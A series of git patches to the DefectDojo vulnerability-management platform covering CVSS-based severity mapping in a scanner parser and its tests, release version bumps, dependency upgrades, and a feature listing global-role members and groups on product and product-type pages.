+ self.set_endpoints(finding, item)
+
 # Returns the complete field processing map: common fields plus any engine-specific
 def get_engine_fields(self) -> dict[str, FieldType]:
 return {
@@ -302,7 +355,7 @@ def parse_finding(self, item: dict[str, Any]) -> Tuple[Finding, Tuple]:
 # Check first whether the field even exists on this item entry; if not, skip it
 if value := item.get(field):
 field_handler(self, finding, value)
- self.set_endpoints(finding, item)
+ self.process_whole_item(finding, item)
 # Make a note of what scanning engine was used for this Finding
 self.append_description(finding, {"Scanning Engine": self.SCANNING_ENGINE})
 return finding, self.get_finding_key(finding)
diff --git a/unittests/scans/appcheck_web_application_scanner/appcheck_web_application_scanner_many_vul.json b/unittests/scans/appcheck_web_application_scanner/appcheck_web_application_scanner_many_vul.json
index ee12493a840..052de390779 100644
--- a/unittests/scans/appcheck_web_application_scanner/appcheck_web_application_scanner_many_vul.json
+++ b/unittests/scans/appcheck_web_application_scanner/appcheck_web_application_scanner_many_vul.json
@@ -514,7 +514,7 @@
 "cvss_score": 0.0,
 "type": "WEB_APP",
 "web_app": "https://example.x73zjffz.com",
- "cvss_v4_vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:N",
+ "cvss_v4_vector": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
 "mss_confirmed": false,
 "category": "web_app",
 "description": "[[markup]]This is simply a report of HTTP request methods supported by the web application.",
diff --git a/unittests/tools/test_appcheck_web_application_scanner_parser.py b/unittests/tools/test_appcheck_web_application_scanner_parser.py
index 8928f89abd6..ebe2186a24f 100644
--- a/unittests/tools/test_appcheck_web_application_scanner_parser.py
+++ b/unittests/tools/test_appcheck_web_application_scanner_parser.py
@@ -4,6 +4,7 @@
 from dojo.tools.appcheck_web_application_scanner.engines.appcheck import AppCheckScanningEngineParser
 from dojo.tools.appcheck_web_application_scanner.engines.base import (
 BaseEngineParser,
+ cvss_score_to_severity,
 escape_non_printable,
 strip_markup,
 )
@@ -96,7 +97,7 @@ def test_appcheck_web_application_scanner_parser_with_many_vuln_has_many_finding
self.assertEqual("a25dae3aff97a06b6923b5fc9cc32826e1fd87ab", finding.unique_id_from_tool) self.assertEqual("Apache Tomcat < v9.0.0.M10 - External Control of Assumed-Immutable Web Parameter in JSP Servlet (CVE-2016-6796)", finding.title) self.assertEqual("2024-06-26", finding.date) - self.assertEqual("Medium", finding.severity) + self.assertEqual("High", finding.severity) self.assertEqual(True, finding.active) self.assertEqual("GET Request", finding.unsaved_request) self.assertEqual("Response", finding.unsaved_response) @@ -121,7 +122,7 @@ def test_appcheck_web_application_scanner_parser_with_many_vuln_has_many_finding self.assertEqual("02769aa244c456f0aad810354748faaa70d089c1129dc9c5", finding.unique_id_from_tool) self.assertEqual("Permitted HTTP Methods", finding.title) self.assertEqual("2024-06-27", finding.date) - self.assertEqual("Low", finding.severity) + self.assertEqual("Medium", finding.severity) self.assertEqual(True, finding.active) self.assertIsNone(finding.unsaved_request) self.assertIsNone(finding.unsaved_response) @@ -334,8 +335,15 @@ def test_appcheck_web_application_scanner_parser_base_engine_parser(self): # Invalid cvss vectors ("", None), ("AV:N/AC:H", None), + ("CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "High"), + ("CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:N/I:N/A:N", None), + ("CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:L/SI:H/SA:H", "Critical"), + ("CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N", "Medium"), + ("CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:H/SI:N/SA:H", "High"), + ("CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:N/SA:H", "Low"), + ("CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:N/SC:N/SI:N/SA:N", None), ]: - self.assertEqual(severity, engine.get_severity(cvss_vector)) + self.assertEqual(severity, engine.parse_cvss_vector(cvss_vector)) # Test component parsing f = Finding() @@ -560,3 +568,24 @@ def test_appcheck_web_application_scanner_parser_non_printable_escape(self): ), ]: self.assertEqual(expected, escape_non_printable(test_string)) + + def test_appcheck_web_application_scanner_parser_cvss_score_mapping(self): + for cvss_score, version, expected in [ + # CVSSv2 + (0.0, 2, "Low"), (0.09, 2, "Low"), (0.1, 2, "Low"), (3.9, 2, "Low"), + (4.0, 2, "Medium"), (5.5, 2, "Medium"), (6.9, 2, "Medium"), + (7.0, 2, "High"), (8.3, 2, "High"), (10.0, 2, "High"), + # CVSSv3 + (0.0, 3, "Info"), (0.09, 3, "Info"), + (0.1, 3, "Low"), (1.2, 3, "Low"), (3.9, 3, "Low"), + (4.0, 3, "Medium"), (5.4, 3, "Medium"), (6.9, 3, "Medium"), + (7.0, 3, "High"), (8.3, 3, "High"), (8.9, 3, "High"), + (9.0, 3, "Critical"), (9.7, 3, "Critical"), (10.0, 3, "Critical"), + # CVSSv4 + (0.0, 4, "Info"), (0.09, 4, "Info"), + (0.1, 4, "Low"), (1.2, 4, "Low"), (3.9, 4, "Low"), + (4.0, 4, "Medium"), (5.4, 4, "Medium"), (6.9, 4, "Medium"), + (7.0, 4, "High"), (8.3, 4, "High"), (8.9, 4, "High"), + (9.0, 4, "Critical"), (9.7, 4, "Critical"), (10.0, 4, "Critical"), + ]: + self.assertEqual(expected, cvss_score_to_severity(cvss_score, version)) From 46fcef2b8efdf2dfbe088c6566378288daa4d04c Mon Sep 17 00:00:00 2001 From: DefectDojo release bot Date: Mon, 16 Sep 2024 18:29:53 +0000 Subject: [PATCH 20/62] Update versions in application files --- components/package.json | 2 +- dojo/__init__.py | 2 +- helm/defectdojo/Chart.yaml | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/components/package.json b/components/package.json index 49f5862eecd..c750020d3ae 100644 --- a/components/package.json +++ b/components/package.json @@ -1,6 +1,6 @@ { 
"name": "defectdojo", - "version": "2.39.0-dev", + "version": "2.38.2", "license" : "BSD-3-Clause", "private": true, "dependencies": { diff --git a/dojo/__init__.py b/dojo/__init__.py index 729d5f3ea8b..bac40506f9a 100644 --- a/dojo/__init__.py +++ b/dojo/__init__.py @@ -4,6 +4,6 @@ # Django starts so that shared_task will use this app. from .celery import app as celery_app # noqa: F401 -__version__ = "2.38.1" +__version__ = "2.38.2" __url__ = "https://github.com/DefectDojo/django-DefectDojo" __docs__ = "https://documentation.defectdojo.com" diff --git a/helm/defectdojo/Chart.yaml b/helm/defectdojo/Chart.yaml index 61744bdfbd6..8fcc60818ca 100644 --- a/helm/defectdojo/Chart.yaml +++ b/helm/defectdojo/Chart.yaml @@ -1,8 +1,8 @@ apiVersion: v2 -appVersion: "2.39.0-dev" +appVersion: "2.38.2" description: A Helm chart for Kubernetes to install DefectDojo name: defectdojo -version: 1.6.150-dev +version: 1.6.150 icon: https://www.defectdojo.org/img/favicon.ico maintainers: - name: madchap From 5abef72d9783332b60d8cb5ec05ba25f1e174300 Mon Sep 17 00:00:00 2001 From: DefectDojo release bot Date: Mon, 16 Sep 2024 19:14:35 +0000 Subject: [PATCH 21/62] Update versions in application files --- components/package.json | 2 +- dojo/__init__.py | 2 +- helm/defectdojo/Chart.yaml | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/components/package.json b/components/package.json index c750020d3ae..49f5862eecd 100644 --- a/components/package.json +++ b/components/package.json @@ -1,6 +1,6 @@ { "name": "defectdojo", - "version": "2.38.2", + "version": "2.39.0-dev", "license" : "BSD-3-Clause", "private": true, "dependencies": { diff --git a/dojo/__init__.py b/dojo/__init__.py index bac40506f9a..82fc1241506 100644 --- a/dojo/__init__.py +++ b/dojo/__init__.py @@ -4,6 +4,6 @@ # Django starts so that shared_task will use this app. 
from .celery import app as celery_app # noqa: F401 -__version__ = "2.38.2" +__version__ = "2.39.0-dev" __url__ = "https://github.com/DefectDojo/django-DefectDojo" __docs__ = "https://documentation.defectdojo.com" diff --git a/helm/defectdojo/Chart.yaml b/helm/defectdojo/Chart.yaml index 8fcc60818ca..9bd09f45faf 100644 --- a/helm/defectdojo/Chart.yaml +++ b/helm/defectdojo/Chart.yaml @@ -1,8 +1,8 @@ apiVersion: v2 -appVersion: "2.38.2" +appVersion: "2.39.0-dev" description: A Helm chart for Kubernetes to install DefectDojo name: defectdojo -version: 1.6.150 +version: 1.6.151-dev icon: https://www.defectdojo.org/img/favicon.ico maintainers: - name: madchap From d6286caa2c71d4c4af34ef289d4dd733547e21ee Mon Sep 17 00:00:00 2001 From: DefectDojo release bot Date: Mon, 16 Sep 2024 19:14:35 +0000 Subject: [PATCH 22/62] Update versions in application files --- components/package.json | 2 +- helm/defectdojo/Chart.yaml | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/components/package.json b/components/package.json index c750020d3ae..49f5862eecd 100644 --- a/components/package.json +++ b/components/package.json @@ -1,6 +1,6 @@ { "name": "defectdojo", - "version": "2.38.2", + "version": "2.39.0-dev", "license" : "BSD-3-Clause", "private": true, "dependencies": { diff --git a/helm/defectdojo/Chart.yaml b/helm/defectdojo/Chart.yaml index 8fcc60818ca..9bd09f45faf 100644 --- a/helm/defectdojo/Chart.yaml +++ b/helm/defectdojo/Chart.yaml @@ -1,8 +1,8 @@ apiVersion: v2 -appVersion: "2.38.2" +appVersion: "2.39.0-dev" description: A Helm chart for Kubernetes to install DefectDojo name: defectdojo -version: 1.6.150 +version: 1.6.151-dev icon: https://www.defectdojo.org/img/favicon.ico maintainers: - name: madchap From 79daae096aee8779ed59f591b46abbeeac52905b Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 16 Sep 2024 14:53:14 -0500 Subject: [PATCH 23/62] Bump ruff from 0.6.4 to 0.6.5 (#10909) Bumps [ruff](https://github.com/astral-sh/ruff) from 0.6.4 to 0.6.5. - [Release notes](https://github.com/astral-sh/ruff/releases) - [Changelog](https://github.com/astral-sh/ruff/blob/main/CHANGELOG.md) - [Commits](https://github.com/astral-sh/ruff/compare/0.6.4...0.6.5) --- updated-dependencies: - dependency-name: ruff dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements-lint.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements-lint.txt b/requirements-lint.txt index 0b0a585331a..d7a367aae58 100644 --- a/requirements-lint.txt +++ b/requirements-lint.txt @@ -1 +1 @@ -ruff==0.6.4 \ No newline at end of file +ruff==0.6.5 \ No newline at end of file From e2a121afd0a41c2ea87e67252229d5e9a5dacea7 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 16 Sep 2024 14:54:01 -0500 Subject: [PATCH 24/62] Bump psycopg[c] from 3.2.1 to 3.2.2 (#10910) Bumps [psycopg[c]](https://github.com/psycopg/psycopg) from 3.2.1 to 3.2.2. - [Changelog](https://github.com/psycopg/psycopg/blob/master/docs/news.rst) - [Commits](https://github.com/psycopg/psycopg/compare/3.2.1...3.2.2) --- updated-dependencies: - dependency-name: psycopg[c] dependency-type: direct:production update-type: version-update:semver-patch ... 
Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 2178c9a2f72..d37739e58d6 100644 --- a/requirements.txt +++ b/requirements.txt @@ -31,7 +31,7 @@ lxml==5.3.0 Markdown==3.7 openpyxl==3.1.5 Pillow==10.4.0 # required by django-imagekit -psycopg[c]==3.2.1 +psycopg[c]==3.2.2 cryptography==43.0.1 python-dateutil==2.9.0.post0 pytz==2024.2 From d0985b98722c7e064e3037b4408e0f54c895a0ea Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 16 Sep 2024 14:54:39 -0500 Subject: [PATCH 25/62] Bump asteval from 1.0.3 to 1.0.4 (#10911) Bumps [asteval](https://github.com/lmfit/asteval) from 1.0.3 to 1.0.4. - [Release notes](https://github.com/lmfit/asteval/releases) - [Commits](https://github.com/lmfit/asteval/compare/1.0.3...1.0.4) --- updated-dependencies: - dependency-name: asteval dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index d37739e58d6..a635e932993 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,5 +1,5 @@ # requirements.txt for DefectDojo using Python 3.x -asteval==1.0.3 +asteval==1.0.4 bleach==6.1.0 bleach[css] celery==5.4.0 From 1ba01da368a33d51fe3e7ceabeaad2d5e0547457 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 16 Sep 2024 14:58:12 -0500 Subject: [PATCH 26/62] Bump pyyaml from 6.0.1 to 6.0.2 (#10913) Bumps [pyyaml](https://github.com/yaml/pyyaml) from 6.0.1 to 6.0.2. - [Release notes](https://github.com/yaml/pyyaml/releases) - [Changelog](https://github.com/yaml/pyyaml/blob/main/CHANGES) - [Commits](https://github.com/yaml/pyyaml/compare/6.0.1...6.0.2) --- updated-dependencies: - dependency-name: pyyaml dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index a635e932993..ab06124569e 100644 --- a/requirements.txt +++ b/requirements.txt @@ -73,4 +73,4 @@ boto3==1.35.18 # Required for Celery Broker AWS (SQS) support netaddr==1.3.0 vulners==2.2.1 fontawesomefree==6.6.0 -PyYAML==6.0.1 +PyYAML==6.0.2 From d4f097d5719ac0ab53a313a61cfa2c152489ec49 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 16 Sep 2024 14:58:46 -0500 Subject: [PATCH 27/62] Bump boto3 from 1.35.18 to 1.35.19 (#10914) Bumps [boto3](https://github.com/boto/boto3) from 1.35.18 to 1.35.19. - [Release notes](https://github.com/boto/boto3/releases) - [Commits](https://github.com/boto/boto3/compare/1.35.18...1.35.19) --- updated-dependencies: - dependency-name: boto3 dependency-type: direct:production update-type: version-update:semver-patch ... 
Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index ab06124569e..11af70433da 100644 --- a/requirements.txt +++ b/requirements.txt @@ -69,7 +69,7 @@ django-ratelimit==4.1.0 argon2-cffi==23.1.0 blackduck==1.1.3 pycurl==7.45.3 # Required for Celery Broker AWS (SQS) support -boto3==1.35.18 # Required for Celery Broker AWS (SQS) support +boto3==1.35.19 # Required for Celery Broker AWS (SQS) support netaddr==1.3.0 vulners==2.2.1 fontawesomefree==6.6.0 From 89f3882062b70c3fa05a1a70661241102a756418 Mon Sep 17 00:00:00 2001 From: "renovate[bot]" <29139614+renovate[bot]@users.noreply.github.com> Date: Mon, 16 Sep 2024 16:16:47 -0500 Subject: [PATCH 28/62] chore(deps): update dependency postcss from 8.4.45 to v8.4.47 (docs/package.json) (#10908) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> --- docs/package-lock.json | 46 +++++++++++++++++++++--------------------- docs/package.json | 2 +- 2 files changed, 24 insertions(+), 24 deletions(-) diff --git a/docs/package-lock.json b/docs/package-lock.json index d3d81bb0ec9..93d84625c28 100644 --- a/docs/package-lock.json +++ b/docs/package-lock.json @@ -6,7 +6,7 @@ "": { "devDependencies": { "autoprefixer": "10.4.20", - "postcss": "8.4.45", + "postcss": "8.4.47", "postcss-cli": "11.0.0" } }, @@ -585,9 +585,9 @@ } }, "node_modules/picocolors": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.1.tgz", - "integrity": "sha512-anP1Z8qwhkbmu7MFP5iTt+wQKXgwzf7zTyGlcdzabySa9vd0Xt392U0rVmz9poOaBj0uHJKyyo9/upk0HrEQew==", + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.0.tgz", + "integrity": "sha512-TQ92mBOW0l3LeMeyLV6mzy/kWr8lkd/hp3mTg7wYK7zJhuBStmGMBG0BdeDZS/dZx1IukaX6Bk11zcln25o1Aw==", "dev": true }, "node_modules/picomatch": { @@ -612,9 +612,9 @@ } }, "node_modules/postcss": { - "version": "8.4.45", - "resolved": "https://registry.npmjs.org/postcss/-/postcss-8.4.45.tgz", - "integrity": "sha512-7KTLTdzdZZYscUc65XmjFiB73vBhBfbPztCYdUNvlaso9PrzjzcmjqBPR0lNGkcVlcO4BjiO5rK/qNz+XAen1Q==", + "version": "8.4.47", + "resolved": "https://registry.npmjs.org/postcss/-/postcss-8.4.47.tgz", + "integrity": "sha512-56rxCq7G/XfB4EkXq9Egn5GCqugWvDFjafDOThIdMBsI15iqPqR5r15TfSr1YPYeEI19YeaXMCbY6u88Y76GLQ==", "dev": true, "funding": [ { @@ -632,8 +632,8 @@ ], "dependencies": { "nanoid": "^3.3.7", - "picocolors": "^1.0.1", - "source-map-js": "^1.2.0" + "picocolors": "^1.1.0", + "source-map-js": "^1.2.1" }, "engines": { "node": "^10 || ^12 || >=14" @@ -834,9 +834,9 @@ } }, "node_modules/source-map-js": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.0.tgz", - "integrity": "sha512-itJW8lvSA0TXEphiRoawsCksnlf8SyvmFzIhltqAHluXd88pkCd+cXJVHTDwdCr0IzwptSm035IHQktUu1QUMg==", + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.1.tgz", + "integrity": "sha512-UXWMKhLOwVKb728IUtQPXxfYU+usdybtUrK/8uGE8CQMvrhOpwvzDBwj0QhSL7MQc7vIsISBG8VQ8+IDQxpfQA==", "dev": true, "engines": { "node": ">=0.10.0" @@ -1372,9 +1372,9 @@ "dev": true }, "picocolors": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.1.tgz", - "integrity": "sha512-anP1Z8qwhkbmu7MFP5iTt+wQKXgwzf7zTyGlcdzabySa9vd0Xt392U0rVmz9poOaBj0uHJKyyo9/upk0HrEQew==", + "version": "1.1.0", + "resolved": 
"https://registry.npmjs.org/picocolors/-/picocolors-1.1.0.tgz", + "integrity": "sha512-TQ92mBOW0l3LeMeyLV6mzy/kWr8lkd/hp3mTg7wYK7zJhuBStmGMBG0BdeDZS/dZx1IukaX6Bk11zcln25o1Aw==", "dev": true }, "picomatch": { @@ -1390,14 +1390,14 @@ "dev": true }, "postcss": { - "version": "8.4.45", - "resolved": "https://registry.npmjs.org/postcss/-/postcss-8.4.45.tgz", - "integrity": "sha512-7KTLTdzdZZYscUc65XmjFiB73vBhBfbPztCYdUNvlaso9PrzjzcmjqBPR0lNGkcVlcO4BjiO5rK/qNz+XAen1Q==", + "version": "8.4.47", + "resolved": "https://registry.npmjs.org/postcss/-/postcss-8.4.47.tgz", + "integrity": "sha512-56rxCq7G/XfB4EkXq9Egn5GCqugWvDFjafDOThIdMBsI15iqPqR5r15TfSr1YPYeEI19YeaXMCbY6u88Y76GLQ==", "dev": true, "requires": { "nanoid": "^3.3.7", - "picocolors": "^1.0.1", - "source-map-js": "^1.2.0" + "picocolors": "^1.1.0", + "source-map-js": "^1.2.1" } }, "postcss-cli": { @@ -1504,9 +1504,9 @@ "dev": true }, "source-map-js": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.0.tgz", - "integrity": "sha512-itJW8lvSA0TXEphiRoawsCksnlf8SyvmFzIhltqAHluXd88pkCd+cXJVHTDwdCr0IzwptSm035IHQktUu1QUMg==", + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.1.tgz", + "integrity": "sha512-UXWMKhLOwVKb728IUtQPXxfYU+usdybtUrK/8uGE8CQMvrhOpwvzDBwj0QhSL7MQc7vIsISBG8VQ8+IDQxpfQA==", "dev": true }, "string-width": { diff --git a/docs/package.json b/docs/package.json index a892ece5668..9720854bf00 100644 --- a/docs/package.json +++ b/docs/package.json @@ -1,6 +1,6 @@ { "devDependencies": { - "postcss": "8.4.45", + "postcss": "8.4.47", "autoprefixer": "10.4.20", "postcss-cli": "11.0.0" } From a64354476b21ee4265985bee4e75c076d7ce1ea9 Mon Sep 17 00:00:00 2001 From: kiblik <5609770+kiblik@users.noreply.github.com> Date: Tue, 17 Sep 2024 00:07:08 +0200 Subject: [PATCH 29/62] feat(members): List global role members in Prod and ProdType (#10850) --- dojo/product/queries.py | 23 ++++++++++++++---- dojo/product/views.py | 6 +++++ dojo/product_type/queries.py | 24 +++++++++++++++---- dojo/product_type/views.py | 9 ++++++- dojo/templates/dojo/view_product_details.html | 21 ++++++++++++++-- dojo/templates/dojo/view_product_type.html | 20 ++++++++++++++-- 6 files changed, 89 insertions(+), 14 deletions(-) diff --git a/dojo/product/queries.py b/dojo/product/queries.py index 8d562c0f9a4..bf856a89888 100644 --- a/dojo/product/queries.py +++ b/dojo/product/queries.py @@ -13,6 +13,7 @@ App_Analysis, DojoMeta, Engagement_Presets, + Global_Role, Languages, Product, Product_API_Scan_Configuration, @@ -71,8 +72,15 @@ def get_authorized_members_for_product(product, permission): if user.is_superuser or user_has_permission(user, product, permission): return Product_Member.objects.filter(product=product).order_by("user__first_name", "user__last_name").select_related("role", "user") - else: - return None + return Product_Member.objects.none() + + +def get_authorized_global_members_for_product(product, permission): + user = get_current_user() + + if user.is_superuser or user_has_permission(user, product, permission): + return Global_Role.objects.filter(group=None, role__isnull=False).order_by("user__first_name", "user__last_name").select_related("role", "user") + return Global_Role.objects.none() def get_authorized_groups_for_product(product, permission): @@ -81,8 +89,15 @@ def get_authorized_groups_for_product(product, permission): if user.is_superuser or user_has_permission(user, product, permission): authorized_groups = get_authorized_groups(Permissions.Group_View) 
return Product_Group.objects.filter(product=product, group__in=authorized_groups).order_by("group__name").select_related("role") - else: - return None + return Product_Group.objects.none() + + +def get_authorized_global_groups_for_product(product, permission): + user = get_current_user() + + if user.is_superuser or user_has_permission(user, product, permission): + return Global_Role.objects.filter(user=None, role__isnull=False).order_by("group__name").select_related("role") + return Global_Role.objects.none() def get_authorized_product_members(permission): diff --git a/dojo/product/views.py b/dojo/product/views.py index e887938d450..13bcd476e50 100644 --- a/dojo/product/views.py +++ b/dojo/product/views.py @@ -92,6 +92,8 @@ Test_Type, ) from dojo.product.queries import ( + get_authorized_global_groups_for_product, + get_authorized_global_members_for_product, get_authorized_groups_for_product, get_authorized_members_for_product, get_authorized_products, @@ -213,8 +215,10 @@ def view_product(request, pid): .prefetch_related("prod_type__members") prod = get_object_or_404(prod_query, id=pid) product_members = get_authorized_members_for_product(prod, Permissions.Product_View) + global_product_members = get_authorized_global_members_for_product(prod, Permissions.Product_View) product_type_members = get_authorized_members_for_product_type(prod.prod_type, Permissions.Product_Type_View) product_groups = get_authorized_groups_for_product(prod, Permissions.Product_View) + global_product_groups = get_authorized_global_groups_for_product(prod, Permissions.Product_View) product_type_groups = get_authorized_groups_for_product_type(prod.prod_type, Permissions.Product_Type_View) personal_notifications_form = ProductNotificationsForm( instance=Notifications.objects.filter(user=request.user).filter(product=prod).first()) @@ -291,8 +295,10 @@ def view_product(request, pid): "benchmarks_percents": benchAndPercent, "benchmarks": benchmarks, "product_members": product_members, + "global_product_members": global_product_members, "product_type_members": product_type_members, "product_groups": product_groups, + "global_product_groups": global_product_groups, "product_type_groups": product_type_groups, "personal_notifications_form": personal_notifications_form, "enabled_notifications": get_enabled_notifications_list(), diff --git a/dojo/product_type/queries.py b/dojo/product_type/queries.py index 737584a5b05..dacee589146 100644 --- a/dojo/product_type/queries.py +++ b/dojo/product_type/queries.py @@ -9,7 +9,7 @@ ) from dojo.authorization.roles_permissions import Permissions from dojo.group.queries import get_authorized_groups -from dojo.models import Product_Type, Product_Type_Group, Product_Type_Member +from dojo.models import Global_Role, Product_Type, Product_Type_Group, Product_Type_Member def get_authorized_product_types(permission): @@ -45,8 +45,15 @@ def get_authorized_members_for_product_type(product_type, permission): if user.is_superuser or user_has_permission(user, product_type, permission): return Product_Type_Member.objects.filter(product_type=product_type).order_by("user__first_name", "user__last_name").select_related("role", "product_type", "user") - else: - return None + return Product_Type_Member.objects.none() + + +def get_authorized_global_members_for_product_type(product_type, permission): + user = get_current_user() + + if user.is_superuser or user_has_permission(user, product_type, permission): + return Global_Role.objects.filter(group=None, role__isnull=False).order_by("user__first_name", 
"user__last_name").select_related("role", "user") + return Global_Role.objects.none() def get_authorized_groups_for_product_type(product_type, permission): @@ -55,8 +62,15 @@ def get_authorized_groups_for_product_type(product_type, permission): if user.is_superuser or user_has_permission(user, product_type, permission): authorized_groups = get_authorized_groups(Permissions.Group_View) return Product_Type_Group.objects.filter(product_type=product_type, group__in=authorized_groups).order_by("group__name").select_related("role", "group") - else: - return None + return Product_Type_Group.objects.none() + + +def get_authorized_global_groups_for_product_type(product_type, permission): + user = get_current_user() + + if user.is_superuser or user_has_permission(user, product_type, permission): + return Global_Role.objects.filter(user=None, role__isnull=False).order_by("group__name").select_related("role", "group") + return Global_Role.objects.none() def get_authorized_product_type_members(permission): diff --git a/dojo/product_type/views.py b/dojo/product_type/views.py index 302aa6dbbf9..2f21f81362a 100644 --- a/dojo/product_type/views.py +++ b/dojo/product_type/views.py @@ -27,6 +27,8 @@ from dojo.models import Product_Type, Product_Type_Group, Product_Type_Member, Role from dojo.product.queries import get_authorized_products from dojo.product_type.queries import ( + get_authorized_global_groups_for_product_type, + get_authorized_global_members_for_product_type, get_authorized_groups_for_product_type, get_authorized_members_for_product_type, get_authorized_product_types, @@ -117,7 +119,9 @@ def view_product_type(request, ptid): page_name = _("View Product Type") pt = get_object_or_404(Product_Type, pk=ptid) members = get_authorized_members_for_product_type(pt, Permissions.Product_Type_View) + global_members = get_authorized_global_members_for_product_type(pt, Permissions.Product_Type_View) groups = get_authorized_groups_for_product_type(pt, Permissions.Product_Type_View) + global_groups = get_authorized_global_groups_for_product_type(pt, Permissions.Product_Type_View) products = get_authorized_products(Permissions.Product_View).filter(prod_type=pt) products = get_page_items(request, products, 25) add_breadcrumb(title=page_name, top_level=False, request=request) @@ -126,7 +130,10 @@ def view_product_type(request, ptid): "pt": pt, "products": products, "groups": groups, - "members": members}) + "members": members, + "global_groups": global_groups, + "global_members": global_members, + }) @user_is_authorized(Product_Type, Permissions.Product_Type_Delete, "ptid") diff --git a/dojo/templates/dojo/view_product_details.html b/dojo/templates/dojo/view_product_details.html index 0005dc3fbbc..ea4514d7356 100644 --- a/dojo/templates/dojo/view_product_details.html +++ b/dojo/templates/dojo/view_product_details.html @@ -297,7 +297,7 @@

[Note: the HTML table markup in the four template hunks below was stripped during text extraction; only the recoverable template-tag changes are kept.]
- {% if product_members or product_type_members %}
+ {% if product_members or product_type_members or global_product_members %}
@@ -350,6 +350,15 @@
+ {% for member in global_product_members %}
+ [new table row rendering {{ member.user.get_full_name }}, a "Global role" label, and {{ member.role }}]
+ {% endfor %}
@@ -385,7 +394,7 @@
- {% if product_groups or product_type_groups %}
+ {% if product_groups or product_type_groups or global_product_groups %}
@@ -437,6 +446,14 @@
+ {% for type_group in global_product_groups %}
+ [new table row rendering {{ type_group.group.name }}, a "Global role" label, and {{ type_group.role }}]
+ {% endfor %}
diff --git a/dojo/templates/dojo/view_product_type.html b/dojo/templates/dojo/view_product_type.html
index ccb90b127b5..70e5058350a 100644
--- a/dojo/templates/dojo/view_product_type.html
+++ b/dojo/templates/dojo/view_product_type.html
@@ -151,7 +151,7 @@
- {% if members %}
+ {% if members or global_members %}
@@ -189,6 +189,14 @@
+ {% for member in global_members %}
+ [new table row rendering {{ member.user.get_full_name }} and {{ member.role }} (Global role)]
+ {% endfor %}
@@ -224,7 +232,7 @@
- {% if groups %}
+ {% if groups or global_groups %}
@@ -262,6 +270,14 @@
+ {% for group in global_groups %}
+ [new table row rendering {{ group.group.name }} and {{ group.role }} (Global role)]
+ {% endfor %}
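
For context on the patch above: the new get_authorized_global_* helpers return Global_Role querysets rather than None, so callers can iterate the results unconditionally; user-bound global roles carry group=None, while group-bound ones carry user=None. A minimal usage sketch under those assumptions — the function name members_context below is hypothetical, while the imports and helper names come from the patch:

    # Sketch only, not part of the patch; members_context is a hypothetical name.
    from dojo.authorization.roles_permissions import Permissions
    from dojo.product.queries import (
        get_authorized_global_members_for_product,
        get_authorized_members_for_product,
    )

    def members_context(product):
        # Direct members carry a product-level role; holders of a global role
        # come back in a separate queryset so the template can label them
        # "Global role" instead of a product-specific one.
        return {
            "product_members": get_authorized_members_for_product(
                product, Permissions.Product_View),
            "global_product_members": get_authorized_global_members_for_product(
                product, Permissions.Product_View),
        }

Because both helpers now return an empty queryset (not None) for unauthorized users, templates can loop over the results without a None check.
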
